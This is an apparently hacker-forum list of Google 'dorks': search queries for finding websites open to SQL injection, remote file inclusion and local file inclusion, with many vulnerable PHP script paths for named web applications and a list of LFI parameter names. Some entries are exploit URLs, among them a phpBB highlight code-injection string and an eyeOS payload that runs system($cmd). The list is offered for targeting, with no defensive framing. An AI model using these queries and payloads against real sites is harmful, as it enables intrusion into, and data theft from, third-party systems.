D.FA.C One-X: SQL Dork

SQL DORK

inurl:”id=” & intext:”Warning: mysql_fetch_assoc()

inurl:”id=” & intext:”Warning: mysql_fetch_array()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: is_writable()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: Unknown()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: pg_exec()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: mysql_query()

inurl:”id=” & intext:”Warning: array_merge()

inurl:”id=” & intext:”Warning: preg_match()

inurl:”id=” & intext:”Warning: ilesize()

inurl:”id=” & intext:”Warning: filesize()

inurl:”id=” & intext:”Warning: filesize()

inurl:”id=” & intext:”Warning: require()

inurl:(0x3a,version

inurl:(@version,0x3a,databse)

inurl:(user,0x3a,pass)

inurl:+union+select+ from

inurl:+union+select+ pass

inurl:+union+select+ SHOP

inurl:+union+select+ admin

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:Stray-Questions-View.php?num=

RFI AND LFI

RFI

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org

/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org

/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org

/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : “powered by AllMyLinks”

/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?

/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php

yahoo = by Kietu? v 3.2

/kietu/index.php?kietu[url_hit]=

11. keyword : “Powered by phpBB 2.0.6?

/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : “powered by CubeCart 3.0.6?

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : “powered by paBugs 2.0 Beta 3?

/class.mysql.php?path_to_bt_dir=

14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php

/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php

/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : “powered eyeOs”

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id

diganti dengan :

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html

/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=

/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=

/application.php?base_path=

23. allinurlp:hplivehelper

/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : “powered by Fantastic News v2.1.2?

/archive.php?CONFIG[script_path]=

26. keyword: “powered by smartblog” AND inurl:?page=login

/index.php?page=

27. allinurl:/forum/

/forum/admin/index.php?inc_conf=

28. keyword:”Powered By FusionPHP”

/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp

/shoutbox/expanded.php?conf=

30. allinurl: /osticket/

/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : “Powered by iUser”

/common.php?include_path=

32. allinurl: “static.php?load=”

/static.php?load=

33. keyworld : /phpcoin/login.php

/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:

/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=

/classes.php?LOCAL_PATH=

LFI

acion=

act=

action=

API_HOME_DIR=

board=

cat=

client_id=

cmd=

cont=

current_frame=

date=

detail=

dir=

display=

download=

f=

file=

fileinclude=

filename=

firm_id=

g=

getdata=

go=

HT=

idd=

inc=

incfile=

incl=

include_file=

include_path=

infile=

info=

ir=

lang=

language=

link=

load=

main=

mainspot=

msg=

num=

openfile=

p=

page=

pagina=

path=

path_to_calendar=

pg=

plik

qry_str=

ruta=

safehtml=

section=

showfile=

side=

site_id=

skin=

static=

str=

strona=

sub=

tresc=

url=

user=